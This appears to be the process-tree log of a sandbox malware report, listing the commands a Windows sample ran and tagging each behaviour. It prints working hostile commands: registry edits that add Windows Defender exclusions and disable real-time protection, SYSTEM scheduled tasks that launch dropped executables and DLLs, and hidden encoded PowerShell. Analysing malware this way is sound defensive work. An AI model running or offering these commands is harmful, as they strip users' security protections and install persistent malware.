C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:944 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1316
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:912
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1508
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKbjMCWkM" /SC once /ST 00:10:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKbjMCWkM"4⤵PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKbjMCWkM"4⤵PID:800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcmBoHFysFBidtSprQ" /SC once /ST 00:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\eNUyhHr.exe\" RP /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:564
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A4D00856-E0C6-423C-A46C-F6F8959529DA} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]1⤵PID:812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:884
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:852
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:576
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1704
-
C:\Windows\system32\taskeng.exetaskeng.exe {5B1090A7-6ACF-4F28-8E47-F22A7943B045} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\eNUyhHr.exeC:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\eNUyhHr.exe RP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmSbULMcr" /SC once /ST 00:11:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmSbULMcr"3⤵PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmSbULMcr"3⤵PID:1396
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:468
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1636
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1908
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giITPjZde" /SC once /ST 00:01:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giITPjZde"3⤵PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giITPjZde"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:824
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:1372
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:328
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:800
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:1060
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dZAkCesbbUKSZxso\LKRiCOrm\LcwfcphhBWCgkPZV.wsf"3⤵PID:872
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dZAkCesbbUKSZxso\LKRiCOrm\LcwfcphhBWCgkPZV.wsf"3⤵
- Modifies data under HKEY_USERS
PID:944 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵PID:916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵PID:576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵PID:952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵PID:1280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵PID:1396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵PID:800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:816
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFQwvHbGd" /SC once /ST 00:08:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFQwvHbGd"3⤵PID:528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFQwvHbGd"3⤵PID:328
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1412
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:520
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1636
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yTojJpVlyxZWLIphK" /SC once /ST 00:04:13 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\SjWRJjG.exe\" 8a /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yTojJpVlyxZWLIphK"3⤵PID:1532
-
-
-
C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\SjWRJjG.exeC:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\SjWRJjG.exe 8a /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcmBoHFysFBidtSprQ"3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1104
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1684
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1740
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xPPqLUFFU\WWDnGa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mvThVpxzbhgVRbG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mvThVpxzbhgVRbG2" /F /xml "C:\Program Files (x86)\xPPqLUFFU\eTcBogV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mvThVpxzbhgVRbG"3⤵PID:824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mvThVpxzbhgVRbG"3⤵PID:1892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xJPCobCplaVVxr" /F /xml "C:\Program Files (x86)\nNTpTrwDNnPU2\ZbHLfpY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xtMHrquZTnBqG2" /F /xml "C:\ProgramData\STCeEXnoOCFBHvVB\HlhAXYs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wJXbRFPdEfkDfWLvy2" /F /xml "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\lSGrmhw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whexYRdIIbHjcPpcGRQ2" /F /xml "C:\Program Files (x86)\LJVhNoouCIYvC\KbkEwSz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "diAnMdtAazTJxxqKi" /SC once /ST 00:03:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dZAkCesbbUKSZxso\ikkVyOKp\yAnycyX.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "diAnMdtAazTJxxqKi"3⤵PID:764
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:528
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:268
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1556
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yTojJpVlyxZWLIphK"3⤵PID:1492
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\ikkVyOKp\yAnycyX.dll",#1 /site_id 5254032⤵PID:1020
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\ikkVyOKp\yAnycyX.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "diAnMdtAazTJxxqKi"4⤵PID:1372
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1016
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1072
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1073163581687756605-179738130747565117929110214-1327538897824381125379255768"1⤵PID:816
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "596403046-1319266673-1369086018974859734-1614925334-845672411232082234-1740981799"1⤵
- Windows security bypass
PID:916
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-979928144-736217906511700991-322257926-982950694-99727357514550834231975615041"1⤵
- Windows security bypass
PID:2028
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-605422301601404070-136531629313782475301176252435-1366822623-534325502-410924626"1⤵
- Windows security bypass
PID:1164
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-876035163-1031521263290209817696816169191281088212245-1912003280914080799"1⤵
- Windows security bypass
PID:1508
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1860
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a8d1ca8324260e9d8491bdcaec9b0937
SHA1e8f17284a7ec07007739f8a245b1df533811f504
